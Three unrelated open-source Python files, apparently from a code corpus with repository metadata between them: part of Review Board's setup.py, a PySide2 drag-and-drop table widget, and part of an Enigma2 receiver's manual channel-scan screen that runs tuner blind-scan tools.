if root_dir != "":
os.chdir(root_dir)
# Tell distutils to put the data_files in platform-specific installation
# locations. See here for an explanation:
# http://groups.google.com/group/comp.lang.python/browse_thread/thread/35ec7b2fed36eaec/2105ee4d9e8042cb
for scheme in INSTALL_SCHEMES.values():
scheme['data'] = scheme['purelib']
class osx_install_data(install_data):
# On MacOS, the platform-specific lib dir is
# /System/Library/Framework/Python/.../
# which is wrong. Python 2.5 supplied with MacOS 10.5 has an
# Apple-specific fix for this in distutils.command.install_data#306. It
# fixes install_lib but not install_data, which is why we roll our own
# install_data class.
def finalize_options(self):
# By the time finalize_options is called, install.install_lib is
# set to the fixed directory, so we set the installdir to install_lib.
# The # install_data class uses ('install_data', 'install_dir') instead.
self.set_undefined_options('install', ('install_lib', 'install_dir'))
install_data.finalize_options(self)
if sys.platform == "darwin":
cmdclasses = {'install_data': osx_install_data}
else:
cmdclasses = {'install_data': install_data}
PACKAGE_NAME = 'ReviewBoard'
if is_release():
download_url = 'http://downloads.reviewboard.org/releases/%s/%s.%s/' % \
(PACKAGE_NAME, VERSION[0], VERSION[1])
else:
download_url = 'http://downloads.reviewboard.org/nightlies/'
# Build the reviewboard package.
setup(name=PACKAGE_NAME,
version=get_package_version(),
license="MIT",
description="Review Board, a web-based code review tool",
url="http://www.reviewboard.org/",
download_url=download_url,
author="The Review Board Project",
author_email="reviewboard@googlegroups.com",
maintainer="Christian Hammond",
maintainer_email="chipx86@chipx86.com",
packages=find_packages(),
entry_points = {
'console_scripts': [
'rb-site = reviewboard.cmdline.rbsite:main',
],
'reviewboard.scmtools': [
'bzr = reviewboard.scmtools.bzr:BZRTool',
'clearcase = reviewboard.scmtools.clearcase:ClearCaseTool',
'cvs = reviewboard.scmtools.cvs:CVSTool',
'git = reviewboard.scmtools.git:GitTool',
'hg = reviewboard.scmtools.hg:HgTool',
'perforce = reviewboard.scmtools.perforce:PerforceTool',
'svn = reviewboard.scmtools.svn:SVNTool',
],
},
cmdclass=cmdclasses,
install_requires=[
'Django>=1.1.1',
'django_evolution',
'Djblets>=0.5.5',
'Pygments>=0.10',
'flup',
'pytz'
],
dependency_links = [
"http://downloads.reviewboard.org/mirror/",
download_url,
],
include_package_data=True,
zip_safe=False,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Environment :: Web Environment",
"Framework :: Django",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Topic :: Software Development",
"Topic :: Software Development :: Quality Assurance",
]
)
|
asutherland/opc-reviewboard
|
setup.py
|
Python
|
mit
| 4,082 | 0.002695 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtWidgets import *
class FDragRowsTableWidget(QTableWidget):
    def __init__(self, rows=0, columns=2, parent=None):
        super(FDragRowsTableWidget, self).__init__(rows, columns, parent)
self.parent = parent
self.setEditTriggers(self.NoEditTriggers)
self.setDragEnabled(True)
self.setAcceptDrops(True)
self.viewport().setAcceptDrops(True)
self.setDragDropOverwriteMode(False)
self.setDropIndicatorShown(True)
self.setSelectionMode(QAbstractItemView.SingleSelection)
self.setSelectionBehavior(QAbstractItemView.SelectRows)
self.setDragDropMode(QAbstractItemView.InternalMove)
headerview = QHeaderView(Qt.Horizontal, self)
self.setHorizontalHeader(headerview)
self.setFocusPolicy(Qt.NoFocus)
self.verticalHeader().setVisible(False)
def dropEvent(self, event):
if event.source() == self and \
(event.dropAction() == Qt.MoveAction or
self.dragDropMode() == QAbstractItemView.InternalMove):
success, row, col, topIndex = self.dropOn(event)
if success:
selRows = self.getSelectedRowsFast()
top = selRows[0]
# print 'top is %d'%top
dropRow = row
if dropRow == -1:
dropRow = self.rowCount()
# print 'dropRow is %d'%dropRow
offset = dropRow - top
# print 'offset is %d'%offset
for i, row in enumerate(selRows):
r = row + offset
if r > self.rowCount() or r < 0:
r = 0
self.insertRow(r)
# print 'inserting row at %d'%r
selRows = self.getSelectedRowsFast()
# print 'selected rows: %s'%selRows
top = selRows[0]
# print 'top is %d'%top
offset = dropRow - top
# print 'offset is %d'%offset
for i, row in enumerate(selRows):
r = row + offset
if r > self.rowCount() or r < 0:
r = 0
for j in range(self.columnCount()):
# print 'source is (%d, %d)'%(row, j)
# print 'item text: %s'%self.item(row,j).text()
source = QTableWidgetItem(self.item(row, j))
# print 'dest is (%d, %d)'%(r,j)
self.setItem(r, j, source)
# Why does this NOT need to be here?
# for row in reversed(selRows):
# self.removeRow(row)
event.accept()
else:
            super(FDragRowsTableWidget, self).dropEvent(event)
def getSelectedRowsFast(self):
selRows = []
for item in self.selectedItems():
if item.row() not in selRows:
selRows.append(item.row())
return selRows
def droppingOnItself(self, event, index):
dropAction = event.dropAction()
if self.dragDropMode() == QAbstractItemView.InternalMove:
dropAction = Qt.MoveAction
if event.source() == self and \
event.possibleActions() & Qt.MoveAction and \
dropAction == Qt.MoveAction:
selectedIndexes = self.selectedIndexes()
child = index
while child.isValid() and child != self.rootIndex():
if child in selectedIndexes:
return True
child = child.parent()
return False
def dropOn(self, event):
if event.isAccepted():
return False, None, None, None
index = QModelIndex()
row = -1
col = -1
if self.viewport().rect().contains(event.pos()):
index = self.indexAt(event.pos())
if not index.isValid() or \
not self.visualRect(index).contains(event.pos()):
index = self.rootIndex()
if self.model().supportedDropActions() & event.dropAction():
if index != self.rootIndex():
dropIndicatorPosition = self.position(
event.pos(), self.visualRect(index), index)
if dropIndicatorPosition == QAbstractItemView.AboveItem:
row = index.row()
col = index.column()
# index = index.parent()
elif dropIndicatorPosition == QAbstractItemView.BelowItem:
row = index.row() + 1
col = index.column()
# index = index.parent()
else:
row = index.row()
col = index.column()
if not self.droppingOnItself(event, index):
# print 'row is %d'%row
# print 'col is %d'%col
return True, row, col, index
return False, None, None, None
def position(self, pos, rect, index):
r = QAbstractItemView.OnViewport
margin = 2
if pos.y() - rect.top() < margin:
r = QAbstractItemView.AboveItem
elif rect.bottom() - pos.y() < margin:
r = QAbstractItemView.BelowItem
elif rect.contains(pos, True):
r = QAbstractItemView.OnItem
if r == QAbstractItemView.OnItem and \
not (self.model().flags(index) & Qt.ItemIsDropEnabled):
r = QAbstractItemView.AboveItem if pos.y() < rect.center(
).y() else QAbstractItemView.BelowItem
return r
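    # Worked example of the hit test above (explanatory comment, not in the
    # original): with margin = 2, a drop within 2 px of rect.top() maps to
    # AboveItem, within 2 px of rect.bottom() to BelowItem, and anywhere else
    # inside rect to OnItem; OnItem is then demoted to Above/BelowItem (split
    # at rect.center().y()) when the target index does not accept drops.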
class FDetailShow(QTextEdit):
def __init__(self, jsondata, parent=None):
super(FDetailShow, self).__init__(parent)
self.parent = parent
self.setText(jsondata)
self.setReadOnly(True)
self.installEventFilter(self)
self.setFocus()
def mousePressEvent(self, event):
if event.button() == Qt.RightButton:
pass
else:
super(FDetailShow, self).mousePressEvent(event)
class FTableItemDetailWidget(QFrame):
def __init__(self, jsondata, row, column, parent=None):
super(FTableItemDetailWidget, self).__init__(parent)
self.parent = parent
self.startX = 0
self.row = row
for i in range(column):
self.startX += self.parent.columnWidth(i)
self.setWindowFlags(Qt.Popup)
self.setFixedSize(self.parent.columnWidth(3), 220)
detailShow = FDetailShow(jsondata, self)
detailShow.setFixedSize(self.width(), 200)
self.titleLabel = QLabel("Data", self)
self.titleLabel.setAlignment(Qt.AlignCenter)
self.titleLabel.setObjectName("FTableItemDetailWidgetTitlebar")
self.titleLabel.setFixedSize(self.parent.columnWidth(3), 20)
mainlayout = QVBoxLayout()
mainlayout.addWidget(self.titleLabel)
mainlayout.addWidget(detailShow)
mainlayout.setSpacing(0)
mainlayout.setContentsMargins(0, 0, 0, 0)
self.setLayout(mainlayout)
self.installEventFilter(self)
self.show()
def eventFilter(self, obj, event):
if event.type() == QEvent.MouseButtonPress:
self.close()
return True
else:
return super(FTableItemDetailWidget, self).eventFilter(obj, event)
def showDetail(self):
self.jsonshowPosX = self.parent.mapToGlobal(QPoint(self.startX, 0)).x()
self.jsonshowPosY = self.parent.mapToGlobal(QPoint(self.startX, self.parent.rowViewportPosition(self.row))).y()\
- self.height() + self.parent.horizontalHeader().height()
self.move(self.jsonshowPosX, self.jsonshowPosY)
self.show()
def resizeEvent(self, event):
self.titleLabel.setFixedWidth(self.width())
|
dragondjf/PFramer
|
qframer/ftablewidget.py
|
Python
|
gpl-3.0
| 7,960 | 0.000126 |
from Screen import Screen
from ServiceScan import ServiceScan
from Components.config import config, ConfigSubsection, ConfigSelection, ConfigYesNo, ConfigInteger, getConfigListEntry, ConfigSlider, ConfigEnableDisable
from Components.ActionMap import NumberActionMap, ActionMap
from Components.ConfigList import ConfigListScreen
from Components.NimManager import nimmanager, getConfigSatlist
from Components.Label import Label
from Components.Sources.StaticText import StaticText
from Tools.HardwareInfo import HardwareInfo
from Screens.InfoBar import InfoBar
from Screens.MessageBox import MessageBox
from enigma import eTimer, eDVBFrontendParametersSatellite, eComponentScan, eDVBFrontendParametersTerrestrial, eDVBFrontendParametersCable, eConsoleAppContainer, eDVBResourceManager
from Components.Converter.ChannelNumbers import channelnumbers
from boxbranding import getMachineBrand
def buildTerTransponder(frequency,
inversion=2, bandwidth = 7000000, fechigh = 6, feclow = 6,
modulation = 2, transmission = 2, guard = 4,
hierarchy = 4, system = 0, plpid = 0):
# print "freq", frequency, "inv", inversion, "bw", bandwidth, "fech", fechigh, "fecl", feclow, "mod", modulation, "tm", transmission, "guard", guard, "hierarchy", hierarchy
parm = eDVBFrontendParametersTerrestrial()
parm.frequency = frequency
parm.inversion = inversion
parm.bandwidth = bandwidth
parm.code_rate_HP = fechigh
parm.code_rate_LP = feclow
parm.modulation = modulation
parm.transmission_mode = transmission
parm.guard_interval = guard
parm.hierarchy = hierarchy
parm.system = system
parm.plpid = plpid
return parm
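# Example call (illustrative, mirroring how getInitialTerrestrialTransponderList
# below uses this helper): an 8 MHz DVB-T transponder at 506 MHz with the other
# parameters left on their auto/default codes:
#     parm = buildTerTransponder(506000000, bandwidth=8000000)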
def getInitialTransponderList(tlist, pos):
list = nimmanager.getTransponders(pos)
for x in list:
if x[0] == 0: #SAT
parm = eDVBFrontendParametersSatellite()
parm.frequency = x[1]
parm.symbol_rate = x[2]
parm.polarisation = x[3]
parm.fec = x[4]
parm.inversion = x[7]
parm.orbital_position = pos
parm.system = x[5]
parm.modulation = x[6]
parm.rolloff = x[8]
parm.pilot = x[9]
tlist.append(parm)
def getInitialCableTransponderList(tlist, nim):
list = nimmanager.getTranspondersCable(nim)
for x in list:
if x[0] == 1: #CABLE
parm = eDVBFrontendParametersCable()
parm.frequency = x[1]
parm.symbol_rate = x[2]
parm.modulation = x[3]
parm.fec_inner = x[4]
parm.inversion = x[5]
parm.system = x[6]
tlist.append(parm)
def getInitialTerrestrialTransponderList(tlist, region, skip_t2 = False):
list = nimmanager.getTranspondersTerrestrial(region)
#self.transponders[self.parsedTer].append((2,freq,bw,const,crh,crl,guard,transm,hierarchy,inv))
#def buildTerTransponder(frequency, inversion = 2, bandwidth = 3, fechigh = 6, feclow = 6,
#modulation = 2, transmission = 2, guard = 4, hierarchy = 4):
for x in list:
if x[0] == 2: #TERRESTRIAL
if skip_t2 and x[10] == eDVBFrontendParametersTerrestrial.System_DVB_T2:
# Should be searching on TerrestrialTransponderSearchSupport.
continue
parm = buildTerTransponder(x[1], x[9], x[2], x[4], x[5], x[3], x[7], x[6], x[8], x[10], x[11])
tlist.append(parm)
cable_bands = {
"DVBC_BAND_EU_VHF_I" : 1 << 0,
"DVBC_BAND_EU_MID" : 1 << 1,
"DVBC_BAND_EU_VHF_III" : 1 << 2,
"DVBC_BAND_EU_SUPER" : 1 << 3,
"DVBC_BAND_EU_HYPER" : 1 << 4,
"DVBC_BAND_EU_UHF_IV" : 1 << 5,
"DVBC_BAND_EU_UHF_V" : 1 << 6,
"DVBC_BAND_US_LO" : 1 << 7,
"DVBC_BAND_US_MID" : 1 << 8,
"DVBC_BAND_US_HI" : 1 << 9,
"DVBC_BAND_US_SUPER" : 1 << 10,
"DVBC_BAND_US_HYPER" : 1 << 11,
}
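# Example (added note, not in the original): the bands ticked in the cable scan
# setup are OR-ed into one bitmask and appended to the scan command, e.g.
#     bands = cable_bands["DVBC_BAND_EU_MID"] | cable_bands["DVBC_BAND_EU_SUPER"]
#     # -> (1 << 1) | (1 << 3) == 10, emitted as "--scan-bands 10"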
cable_autoscan_nimtype = {
'SSH108' : 'ssh108',
'TT3L10' : 'tt3l10',
'TURBO' : 'vuplus_turbo_c'
}
terrestrial_autoscan_nimtype = {
'SSH108' : 'ssh108_t2_scan',
'TT3L10' : 'tt3l10_t2_scan',
'TURBO' : 'vuplus_turbo_t'
}
def GetDeviceId(filter, nim_idx):
tuners={}
device_id = 0
socket_id = 0
for nim in nimmanager.nim_slots:
name_token = nim.description.split(' ')
name = name_token[-1][4:-1]
if name == filter:
if socket_id == nim_idx:
break
if device_id: device_id = 0
else: device_id = 1
socket_id += 1
return device_id
class CableTransponderSearchSupport:
# def setCableTransponderSearchResult(self, tlist):
# pass
# def cableTransponderSearchFinished(self):
# pass
def __init__(self):
pass
def tryGetRawFrontend(self, feid):
res_mgr = eDVBResourceManager.getInstance()
if res_mgr:
raw_channel = res_mgr.allocateRawChannel(self.feid)
if raw_channel:
frontend = raw_channel.getFrontend()
if frontend:
frontend.closeFrontend() # immediate close...
del frontend
del raw_channel
return True
return False
def cableTransponderSearchSessionClosed(self, *val):
print "cableTransponderSearchSessionClosed, val", val
self.cable_search_container.appClosed.remove(self.cableTransponderSearchClosed)
self.cable_search_container.dataAvail.remove(self.getCableTransponderData)
if val and len(val):
if val[0]:
self.setCableTransponderSearchResult(self.__tlist)
else:
self.cable_search_container.sendCtrlC()
self.setCableTransponderSearchResult(None)
self.cable_search_container = None
self.cable_search_session = None
self.__tlist = None
self.cableTransponderSearchFinished()
def cableTransponderSearchClosed(self, retval):
print "cableTransponderSearch finished", retval
self.cable_search_session.close(True)
def getCableTransponderData(self, str):
#prepend any remaining data from the previous call
str = self.remainingdata + str
#split in lines
lines = str.split('\n')
#'str' should end with '\n', so when splitting, the last line should be empty. If this is not the case, we received an incomplete line
if len(lines[-1]):
#remember this data for next time
self.remainingdata = lines[-1]
lines = lines[0:-1]
else:
self.remainingdata = ""
for line in lines:
data = line.split()
if len(data):
if data[0] == 'OK':
print str
parm = eDVBFrontendParametersCable()
qam = { "QAM16" : parm.Modulation_QAM16,
"QAM32" : parm.Modulation_QAM32,
"QAM64" : parm.Modulation_QAM64,
"QAM128" : parm.Modulation_QAM128,
"QAM256" : parm.Modulation_QAM256 }
inv = { "INVERSION_OFF" : parm.Inversion_Off,
"INVERSION_ON" : parm.Inversion_On,
"INVERSION_AUTO" : parm.Inversion_Unknown }
fec = { "FEC_AUTO" : parm.FEC_Auto,
"FEC_1_2" : parm.FEC_1_2,
"FEC_2_3" : parm.FEC_2_3,
"FEC_3_4" : parm.FEC_3_4,
"FEC_5_6" : parm.FEC_5_6,
"FEC_7_8" : parm.FEC_7_8,
"FEC_8_9" : parm.FEC_8_9,
"FEC_3_5" : parm.FEC_3_5,
"FEC_4_5" : parm.FEC_4_5,
"FEC_9_10" : parm.FEC_9_10,
"FEC_NONE" : parm.FEC_None }
parm.frequency = int(data[1])
parm.symbol_rate = int(data[2])
parm.fec_inner = fec[data[3]]
parm.modulation = qam[data[4]]
parm.inversion = inv[data[5]]
self.__tlist.append(parm)
tmpstr = _("Try to find used transponders in cable network.. please wait...")
tmpstr += "\n\n"
tmpstr += data[1].isdigit() and "%s MHz " % (int(data[1]) / 1000.) or data[1]
tmpstr += data[0]
self.cable_search_session["text"].setText(tmpstr)
def startCableTransponderSearch(self, nim_idx):
def GetCommand(nim_idx):
global cable_autoscan_nimtype
try:
nim_name = nimmanager.getNimName(nim_idx)
if nim_name is not None and nim_name != "":
device_id = ""
nim_name = nim_name.split(' ')[-1][4:-1]
if nim_name == 'TT3L10':
try:
device_id = GetDeviceId('TT3L10', nim_idx)
device_id = "--device=%s" % (device_id)
except Exception, err:
print "GetCommand ->", err
device_id = "--device=0"
# print nim_idx, nim_name, cable_autoscan_nimtype[nim_name], device_id
command = "%s %s" % (cable_autoscan_nimtype[nim_name], device_id)
return command
except Exception, err:
print "GetCommand ->", err
return "tda1002x"
if not self.tryGetRawFrontend(nim_idx):
self.session.nav.stopService()
if not self.tryGetRawFrontend(nim_idx):
if self.session.pipshown:
self.session.infobar.showPiP()
if not self.tryGetRawFrontend(nim_idx):
self.cableTransponderSearchFinished()
return
self.__tlist = [ ]
self.remainingdata = ""
self.cable_search_container = eConsoleAppContainer()
self.cable_search_container.appClosed.append(self.cableTransponderSearchClosed)
self.cable_search_container.dataAvail.append(self.getCableTransponderData)
cableConfig = config.Nims[nim_idx].cable
tunername = nimmanager.getNimName(nim_idx)
try:
bus = nimmanager.getI2CDevice(nim_idx)
if bus is None:
print "ERROR: could not get I2C device for nim", nim_idx, "for cable transponder search"
bus = 2
except:
# older API
if nim_idx < 2:
if HardwareInfo().get_device_name() == "dm500hd":
bus = 2
else:
bus = nim_idx
else:
if nim_idx == 2:
bus = 2 # DM8000 first nim is /dev/i2c/2
else:
bus = 4 # DM8000 second num is /dev/i2c/4
bin_name = None
if tunername == "CXD1981":
bin_name = "CXD1981"
cmd = "cxd1978 --init --scan --verbose --wakeup --inv 2 --bus %d" % bus
elif tunername.startswith("Sundtek"):
bin_name = "mediaclient"
cmd = "/opt/bin/mediaclient --blindscan %d" % nim_idx
else:
bin_name = GetCommand(nim_idx)
cmd = "%(BIN_NAME)s --init --scan --verbose --wakeup --inv 2 --bus %(BUS)d" % {'BIN_NAME':bin_name, 'BUS':bus}
if cableConfig.scan_type.value == "bands":
cmd += " --scan-bands "
bands = 0
if cableConfig.scan_band_EU_VHF_I.value:
bands |= cable_bands["DVBC_BAND_EU_VHF_I"]
if cableConfig.scan_band_EU_MID.value:
bands |= cable_bands["DVBC_BAND_EU_MID"]
if cableConfig.scan_band_EU_VHF_III.value:
bands |= cable_bands["DVBC_BAND_EU_VHF_III"]
if cableConfig.scan_band_EU_UHF_IV.value:
bands |= cable_bands["DVBC_BAND_EU_UHF_IV"]
if cableConfig.scan_band_EU_UHF_V.value:
bands |= cable_bands["DVBC_BAND_EU_UHF_V"]
if cableConfig.scan_band_EU_SUPER.value:
bands |= cable_bands["DVBC_BAND_EU_SUPER"]
if cableConfig.scan_band_EU_HYPER.value:
bands |= cable_bands["DVBC_BAND_EU_HYPER"]
if cableConfig.scan_band_US_LOW.value:
bands |= cable_bands["DVBC_BAND_US_LO"]
if cableConfig.scan_band_US_MID.value:
bands |= cable_bands["DVBC_BAND_US_MID"]
if cableConfig.scan_band_US_HIGH.value:
bands |= cable_bands["DVBC_BAND_US_HI"]
if cableConfig.scan_band_US_SUPER.value:
bands |= cable_bands["DVBC_BAND_US_SUPER"]
if cableConfig.scan_band_US_HYPER.value:
bands |= cable_bands["DVBC_BAND_US_HYPER"]
cmd += str(bands)
else:
cmd += " --scan-stepsize "
cmd += str(cableConfig.scan_frequency_steps.value)
if cableConfig.scan_mod_qam16.value:
cmd += " --mod 16"
if cableConfig.scan_mod_qam32.value:
cmd += " --mod 32"
if cableConfig.scan_mod_qam64.value:
cmd += " --mod 64"
if cableConfig.scan_mod_qam128.value:
cmd += " --mod 128"
if cableConfig.scan_mod_qam256.value:
cmd += " --mod 256"
if cableConfig.scan_sr_6900.value:
cmd += " --sr 6900000"
if cableConfig.scan_sr_6875.value:
cmd += " --sr 6875000"
if cableConfig.scan_sr_ext1.value > 450:
cmd += " --sr "
cmd += str(cableConfig.scan_sr_ext1.value)
cmd += "000"
if cableConfig.scan_sr_ext2.value > 450:
cmd += " --sr "
cmd += str(cableConfig.scan_sr_ext2.value)
cmd += "000"
print bin_name, " CMD is", cmd
self.cable_search_container.execute(cmd)
tmpstr = _("Try to find used transponders in cable network.. please wait...")
tmpstr += "\n\n..."
self.cable_search_session = self.session.openWithCallback(self.cableTransponderSearchSessionClosed, MessageBox, tmpstr, MessageBox.TYPE_INFO)
class TerrestrialTransponderSearchSupport:
# def setTerrestrialTransponderSearchResult(self, tlist):
# pass
# def terrestrialTransponderSearchFinished(self):
# pass
def terrestrialTransponderSearchSessionClosed(self, *val):
print "TerrestrialTransponderSearchSessionClosed, val", val
self.terrestrial_search_container.appClosed.remove(self.terrestrialTransponderSearchClosed)
self.terrestrial_search_container.dataAvail.remove(self.getTerrestrialTransponderData)
if val and len(val):
if val[0]:
self.setTerrestrialTransponderSearchResult(self.__tlist)
else:
self.terrestrial_search_container.sendCtrlC()
self.setTerrestrialTransponderSearchResult(None)
self.terrestrial_search_container = None
self.terrestrial_search_session = None
self.__tlist = None
self.terrestrialTransponderSearchFinished()
def terrestrialTransponderSearchClosed(self, retval):
self.setTerrestrialTransponderData()
opt = self.terrestrialTransponderGetOpt()
if opt is None:
print "terrestrialTransponderSearch finished", retval
self.terrestrial_search_session.close(True)
else:
(freq, bandWidth) = opt
self.terrestrialTransponderSearch(freq, bandWidth)
def getTerrestrialTransponderData(self, str):
self.terrestrial_search_data += str
def setTerrestrialTransponderData(self):
print self.terrestrial_search_data
data = self.terrestrial_search_data.split()
if len(data):
# print "[setTerrestrialTransponderData] data : ", data
if data[0] == 'OK':
# DVB-T : OK frequency bandwidth delivery system -1
# DVB-T2 : OK frequency bandwidth delivery system number_of_plp plp_id0:plp_type0
            if int(data[3]) == 1: # DVB-T
parm = eDVBFrontendParametersTerrestrial()
parm.frequency = int(data[1])
parm.bandwidth = int(data[2])
parm.inversion = parm.Inversion_Unknown
parm.code_rate_HP = parm.FEC_Auto
parm.code_rate_LP = parm.FEC_Auto
parm.modulation = parm.Modulation_Auto
parm.transmission_mode = parm.TransmissionMode_Auto
parm.guard_interval = parm.GuardInterval_Auto
parm.hierarchy = parm.Hierarchy_Auto
parm.system = parm.System_DVB_T
parm.plpid = 0
self.__tlist.append(parm)
else:
plp_list = data[5:]
plp_num = int(data[4])
if len(plp_list) > plp_num:
plp_list = plp_list[:plp_num]
for plp in plp_list:
(plp_id, plp_type) = plp.split(':')
if plp_type == '0': # common PLP:
continue
parm = eDVBFrontendParametersTerrestrial()
parm.frequency = int(data[1])
parm.bandwidth = self.terrestrialTransponderconvBandwidth_P(int(data[2]))
parm.inversion = parm.Inversion_Unknown
parm.code_rate_HP = parm.FEC_Auto
parm.code_rate_LP = parm.FEC_Auto
parm.modulation = parm.Modulation_Auto
parm.transmission_mode = parm.TransmissionMode_Auto
parm.guard_interval = parm.GuardInterval_Auto
parm.hierarchy = parm.Hierarchy_Auto
parm.system = parm.System_DVB_T2
parm.plpid = int(plp_id)
self.__tlist.append(parm)
tmpstr = _("Try to find used Transponders in terrestrial network.. please wait...")
tmpstr += "\n\n"
tmpstr += data[1][:-3]
tmpstr += " kHz "
tmpstr += data[0]
self.terrestrial_search_session["text"].setText(tmpstr)
def terrestrialTransponderInitSearchList(self, searchList, region):
tpList = nimmanager.getTranspondersTerrestrial(region)
for x in tpList:
if x[0] == 2: #TERRESTRIAL
freq = x[1] # frequency
bandWidth = self.terrestrialTransponderConvBandwidth_I(x[2]) # bandWidth
parm = (freq, bandWidth)
searchList.append(parm)
def terrestrialTransponderConvBandwidth_I(self, _bandWidth):
bandWidth = {
eDVBFrontendParametersTerrestrial.Bandwidth_8MHz : 8000000,
eDVBFrontendParametersTerrestrial.Bandwidth_7MHz : 7000000,
eDVBFrontendParametersTerrestrial.Bandwidth_6MHz : 6000000,
eDVBFrontendParametersTerrestrial.Bandwidth_5MHz : 5000000,
eDVBFrontendParametersTerrestrial.Bandwidth_1_712MHz : 1712000,
eDVBFrontendParametersTerrestrial.Bandwidth_10MHz : 10000000,
}.get(_bandWidth, 8000000)
return bandWidth
def terrestrialTransponderconvBandwidth_P(self, _bandWidth):
bandWidth = {
8000000 : eDVBFrontendParametersTerrestrial.Bandwidth_8MHz,
7000000 : eDVBFrontendParametersTerrestrial.Bandwidth_7MHz,
6000000 : eDVBFrontendParametersTerrestrial.Bandwidth_6MHz,
5000000 : eDVBFrontendParametersTerrestrial.Bandwidth_5MHz,
1712000 : eDVBFrontendParametersTerrestrial.Bandwidth_1_712MHz,
10000000 : eDVBFrontendParametersTerrestrial.Bandwidth_10MHz,
}.get(_bandWidth, eDVBFrontendParametersTerrestrial.Bandwidth_8MHz)
return bandWidth
def terrestrialTransponderGetOpt(self):
if len(self.terrestrial_search_list) > 0:
return self.terrestrial_search_list.pop(0)
else:
return None
def terrestrialTransponderGetCmd(self, nim_idx):
global terrestrial_autoscan_nimtype
try:
nim_name = nimmanager.getNimName(nim_idx)
if nim_name is not None and nim_name != "":
device_id = ""
nim_name = nim_name.split(' ')[-1][4:-1]
if nim_name == 'TT3L10':
try:
device_id = GetDeviceId('TT3L10', nim_idx)
device_id = "--device %s" % (device_id)
except Exception, err:
print "terrestrialTransponderGetCmd ->", err
device_id = "--device 0"
# print nim_idx, nim_name, terrestrial_autoscan_nimtype[nim_name], device_id
command = "%s %s" % (terrestrial_autoscan_nimtype[nim_name], device_id)
return command
except Exception, err:
print "terrestrialTransponderGetCmd ->", err
return ""
def startTerrestrialTransponderSearch(self, nim_idx, region):
if not self.tryGetRawFrontend(nim_idx):
self.session.nav.stopService()
if not self.tryGetRawFrontend(nim_idx):
if self.session.pipshown: # try to disable pip
self.session.pipshown = False
del self.session.pip
if not self.tryGetRawFrontend(nim_idx):
self.terrestrialTransponderSearchFinished()
return
self.__tlist = [ ]
self.terrestrial_search_container = eConsoleAppContainer()
self.terrestrial_search_container.appClosed.append(self.terrestrialTransponderSearchClosed)
self.terrestrial_search_container.dataAvail.append(self.getTerrestrialTransponderData)
self.terrestrial_search_binName = self.terrestrialTransponderGetCmd(nim_idx)
self.terrestrial_search_bus = nimmanager.getI2CDevice(nim_idx)
if self.terrestrial_search_bus is None:
# print "ERROR: could not get I2C device for nim", nim_idx, "for terrestrial transponder search"
self.terrestrial_search_bus = 2
self.terrestrial_search_list = []
        self.terrestrialTransponderInitSearchList(self.terrestrial_search_list, region)
(freq, bandWidth) = self.terrestrialTransponderGetOpt()
self.terrestrialTransponderSearch(freq, bandWidth)
tmpstr = _("Try to find used transponders in terrestrial network.. please wait...")
tmpstr += "\n\n..."
self.terrestrial_search_session = self.session.openWithCallback(self.terrestrialTransponderSearchSessionClosed, MessageBox, tmpstr, MessageBox.TYPE_INFO)
def terrestrialTransponderSearch(self, freq, bandWidth):
self.terrestrial_search_data = ""
cmd = "%s --freq %d --bw %d --bus %d --ds 2" % (self.terrestrial_search_binName, freq, bandWidth, self.terrestrial_search_bus)
print "SCAN CMD : ",cmd
self.terrestrial_search_container.execute(cmd)
class ScanSetup(ConfigListScreen, Screen, CableTransponderSearchSupport, TerrestrialTransponderSearchSupport):
def __init__(self, session):
Screen.__init__(self, session)
Screen.setTitle(self, _("Manual Scan"))
self.finished_cb = None
self.updateSatList()
self.service = session.nav.getCurrentService()
self.feinfo = None
self.networkid = 0
frontendData = None
if self.service is not None:
self.feinfo = self.service.frontendInfo()
frontendData = self.feinfo and self.feinfo.getAll(True)
self.ter_channel_input = False
self.ter_tnumber = None
self.createConfig(frontendData)
del self.feinfo
del self.service
self.session.postScanService = session.nav.getCurrentlyPlayingServiceOrGroup()
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Scan"))
self["actions"] = NumberActionMap(["SetupActions", "MenuActions", "ColorActions"],
{
"ok": self.keyGo,
"save": self.keyGo,
"cancel": self.keyCancel,
"red": self.keyCancel,
"green": self.keyGo,
"menu": self.doCloseRecursive,
}, -2)
self.statusTimer = eTimer()
self.statusTimer.callback.append(self.updateStatus)
#self.statusTimer.start(5000, True)
self.list = []
ConfigListScreen.__init__(self, self.list)
self["header"] = Label(_("Manual Scan"))
if not self.scan_nims.value == "":
self.createSetup()
self["introduction"] = Label(_("Press OK to start the scan"))
else:
self["introduction"] = Label(_("Nothing to scan!\nPlease setup your tuner settings before you start a service scan."))
def runAsync(self, finished_cb):
self.finished_cb = finished_cb
self.keyGo()
def updateSatList(self):
self.satList = []
for slot in nimmanager.nim_slots:
if slot.isCompatible("DVB-S"):
self.satList.append(nimmanager.getSatListForNim(slot.slot))
else:
self.satList.append(None)
def createSetup(self):
self.list = []
self.multiscanlist = []
index_to_scan = int(self.scan_nims.value)
print "ID: ", index_to_scan
self.tunerEntry = getConfigListEntry(_("Tuner"), self.scan_nims)
self.list.append(self.tunerEntry)
if self.scan_nims == [ ]:
return
self.typeOfScanEntry = None
self.typeOfInputEntry = None
self.systemEntry = None
self.modulationEntry = None
self.preDefSatList = None
self.TerrestrialTransponders = None
self.TerrestrialRegionEntry = None
nim = nimmanager.nim_slots[index_to_scan]
if nim.isCompatible("DVB-S"):
self.typeOfScanEntry = getConfigListEntry(_("Type of scan"), self.scan_type)
self.list.append(self.typeOfScanEntry)
elif nim.isCompatible("DVB-C"):
if config.Nims[index_to_scan].cable.scan_type.value != "provider": # only show predefined transponder if in provider mode
if self.scan_typecable.value == "predefined_transponder":
self.scan_typecable.value = self.cable_toggle[self.last_scan_typecable]
self.last_scan_typecable = self.scan_typecable.value
self.typeOfScanEntry = getConfigListEntry(_("Type of scan"), self.scan_typecable)
self.list.append(self.typeOfScanEntry)
elif nim.isCompatible("DVB-T"):
self.typeOfScanEntry = getConfigListEntry(_("Type of scan"), self.scan_typeterrestrial)
self.list.append(self.typeOfScanEntry)
if self.scan_typeterrestrial.value == "single_transponder":
self.typeOfInputEntry = getConfigListEntry(_("Use frequency or channel"), self.scan_input_as)
if self.ter_channel_input:
self.list.append(self.typeOfInputEntry)
else:
self.scan_input_as.value = self.scan_input_as.choices[0]
self.scan_networkScan.value = False
